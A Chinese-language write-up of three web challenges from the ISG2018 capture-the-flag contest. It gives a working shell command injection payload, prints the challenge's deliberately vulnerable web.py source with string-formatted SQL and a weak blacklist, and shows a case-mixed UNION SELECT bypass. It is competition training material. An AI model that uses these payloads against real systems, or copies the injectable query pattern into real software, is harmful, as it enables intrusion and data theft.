ISG2018 web题Writeup

0x01.命令注入

这题可以使用burpsuite扫出来，但是可能需要测一下。

得知payload为:i%7cecho%20gzavvlsv9c%20q9szmriaiy%7c%7ca%20%23'%20%7cecho%20gzavvlsv9c%20q9szmriaiy%7c%7ca%20%23%7c%22%20%7cecho%20gzavvlsv9c%20q9szmriaiy%7c%7ca%20%23

刚开始有点尴尬，以为不行了呢。

但是大家可以注意到，等号后面是输出了的，也就是说确实执行了echo的。

然后执行whoami确实执行成功了。

然后就是直接ls得到flag路径cat flag了。

http://202.120.7.205:60003/index.php?calc=i|echo%20gzavvlsv9c%20q9szmriaiy||a%20%23%27%20|echo%20gzavvlsv9c%20q9szmriaiy||a%20%23|%22%20|whoami||a%20%23

0x02.

提供了如下py文件。

很简单可以看出是存在SQL注入的，但是有部分过滤。

#coding: utf8
import web
import os
import re
import sys
import sqlite3
from web.contrib.template import render_mako

abspath = os.path.dirname(__file__)
sys.path.append(abspath)
#os.chdir(abspath)
urls = (
    '/', 'index',
    '/news-(.+).html', 'news',
    # webpy URI route line by line.
)

app = web.application(urls, globals(), autoreload=True)

web.config.debug = True


def my_loadhook():
    web.header('content-type', 'text/html;charset=utf-8', unique=True)


app.add_processor(web.loadhook(my_loadhook))


def notfound():
    return web.notfound('404')


def internalerror():
    return web.internalerror('404')


app.notfound = notfound
app.internalerror = internalerror

render = render_mako(
    directories=[abspath + '/templates'],
    input_encoding='utf-8',
    output_encoding='utf-8',
)

def codesafe(n):
    if re.search("select", n) or re.search(" ", n) or re.search("where", n) or re.search("=", n) or re.search("'", n):
        return False
    else:
        return True




class index:
    def GET(self):

        try:
            conn = sqlite3.connect(abspath + '/db/data.db')
        except:
            conn = sqlite3.connect('db/data.db')
        cur = conn.cursor()
        a = cur.execute('select id,title from news order by id asc').fetchall()
        cur.close()
        conn.close()
        return render.index(list=a)


class news:
    def GET(self, id):
        # try:
        #    id = web.input()['id']
        # except:
        #    raise web.seeother('/')
        if not codesafe(id):
            return 'Hacker?'
        try:
            conn = sqlite3.connect(abspath + '/db/data.db')
        except:
            conn = sqlite3.connect('db/data.db')
        cur = conn.cursor()
        sql = 'select title,content from news where id = {0}'.format(id)
        a = cur.execute(sql).fetchall()
        cur.close()
        conn.close()
        return render.news(title=a[0][0], content=a[0][1])


if __name__ == '__main__':
    app.run()
else:
    application = app.wsgifunc()

　　因为根本都没有验证大小写所以直接大小写就可以绕过，这里分享一个比赛的tips，注入里好多表明列明都是flag，别去猜裤猜表了，直接select flag from flag试试。

　　所以得出payload为：http://202.120.7.206:60019/news-2/**/uNion/**/sELECT/**/1,flag/**/FROM/**/flag.html

0x03.

　　这题做出来的人比较多也比较low。之前刷题就刷到过。

　　一打开就是提示要输入密码

　　

　　然后源码里看到了一个base64加密的发现并不是flag

　　

　　最终直接curl http://202.120.7.207:60007/index.html得到flag

　　　　

表示只会做WEB 至于PWN实在是有心无力。